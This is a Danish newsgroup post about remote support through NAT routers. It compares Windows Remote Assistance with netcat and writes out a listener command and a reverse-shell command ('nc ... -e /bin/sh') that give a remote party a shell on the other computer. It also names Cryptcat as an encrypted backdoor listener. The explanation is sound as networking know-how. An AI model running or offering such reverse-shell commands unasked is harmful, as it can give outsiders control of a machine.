Axel Hammerschmidt <hlexa@hotmail.com> wrote:
> Henning <no.mail@all.invalid> wrote:
>
> > >Det hedder Fjernsupport. Kig i Windows Hjælp.
> >
> > Duer ikke over internet/firewall/routere osv.
>
> Forbindelsen initieres af den der ønsker supporten og er vedkommende bag
> en router vil den tillade det.
>
> Se:
>
>
http://support.microsoft.com/kb/300546/da
>
> og - link på siden til:
>
>
http://support.microsoft.com/kb/301529/
Sammenlign f.eks med UNIX kommandoen Netcat.
På WAN siden starter supporteren først med:
$ nc -l -p <port nr>
Og på LAN siden starter novicen derefter med:
$ nc <supporterens ip-adresse> <port nr> -e /bin/sh
Nu har supporteren en Shell på novicens computer gennem novicens NAT
routeren.
Det kaldes for 'Shovelling a Shell'. De fleste UNIX til almindelig brug
bliver Netcat ikke compileret med denne kommando. Og hvor den er der,
kommer der som regel en 'Dangerous!' advarsel ud for kommandoen når man
be'r om hjælp: nc -?.
Der findes andre 'backdoor listener' - bl.a een der hedder Cryptcat,
hvor trafikken er krypteret og som (osse) kører på Windows. Google!
--
"I believe in having an open mind, but not so open that your brains fall
out." Grace M. Hopper.